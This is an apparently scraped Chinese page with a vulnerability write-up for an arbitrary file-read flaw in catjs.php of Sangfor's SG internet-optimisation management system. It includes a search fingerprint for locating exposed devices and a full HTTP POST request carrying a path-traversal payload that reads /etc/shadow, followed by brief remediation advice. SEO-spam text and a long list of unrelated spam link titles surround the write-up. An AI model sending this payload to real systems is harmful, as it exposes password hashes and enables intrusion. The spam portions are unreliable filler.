当前位置: 首页 > news >正文

郑州企业网站优化公司网站cms

郑州企业网站优化公司,网站cms,免费咨询聊天,wordpress 怎么改url深信服 SG上网优化管理系统 catjs.php 任意文件读取漏洞 一、漏洞描述二、漏洞影响三、网络测绘四、漏洞复现小龙POC检测: 五、 修复建议 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间…

深信服 SG上网优化管理系统 catjs.php 任意文件读取漏洞

  • 一、漏洞描述
  • 二、漏洞影响
  • 三、网络测绘
  • 四、漏洞复现
    • 小龙POC检测:
  • 五、 修复建议

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、漏洞描述

深信服 SG上网优化管理系统 catjs.php 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件

二、漏洞影响

深信服 SG上网优化管理系统

三、网络测绘

title==“SANGFOR上网优化管理”

四、漏洞复现

登陆页面

在这里插入图片描述
验证POC

POST /php/catjs.php["../../../../../../etc/shadow"]

burp发包验证:

POST /php/catjs.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Content-Length: 32["../../../../../../etc/shadow"]

在这里插入图片描述

小龙POC检测:

说明一下,由于监管强制要求,POC要等护网后才能开放

小龙POC传送门: 小龙POC工具

在这里插入图片描述

五、 修复建议

关闭互联网访问权限,将该接口设置权限认证(仅允许内部访问)
尽快打补丁!

http://www.khdw.cn/news/25384.html

相关文章:

  • 党建网站 自身建设重庆seo顾问
  • 有没有网站建设的兼职如何注册百度账号
  • 电子商务网站的建设心得体会china东莞seo
  • 长春仿站定制模板建站营销软文网站
  • 织梦做网站也是模板吗常见的网络营销方式有哪几种
  • 做做网站seo tdk
  • 企业站seo点击软件搜索引擎营销方案例子
  • 中国建设部网站查询网技能培训班有哪些
  • 开发触屏版网站标签渠道推广有哪些方式
  • 无锡哪里有做网站搜索引擎收录
  • 网站建设推广保举火13星seo快速排名软件网址
  • 社保网站做员工用工备案吗搜索电影免费观看播放
  • 孝感做网站公司广州seo顾问
  • 赶集网做网站热线电话如何利用网络进行推广和宣传
  • 建网站的工具有哪些青岛seo排名收费
  • php网站忘记后台密码如何发布自己的网站
  • 哈尔滨市建设安全监察网站外贸营销型网站制作公司
  • 设计一套企业网站设计报价广州网络推广公司
  • 郑州建设企业网站贴吧引流推广
  • 深圳福田网站建设百度推广竞价
  • 公司画册设计模板关键词推广优化外包
  • 做视频网站把视频放在哪里seo优化快速排名技术
  • h5网站建设哪家好中国制造网外贸平台
  • 网站空间到期了百度一下你就知道了 官网
  • 网站服务器怎么配郑州网站运营实力乐云seo
  • 网站安全软件长沙seo网站管理
  • 淄博市建设局网站河南seo快速排名
  • 0基础建站教程军事新闻 今日关注
  • wordpress fonts外链seo
  • 做网站的公司 经营范围搜狗站长平台验证不了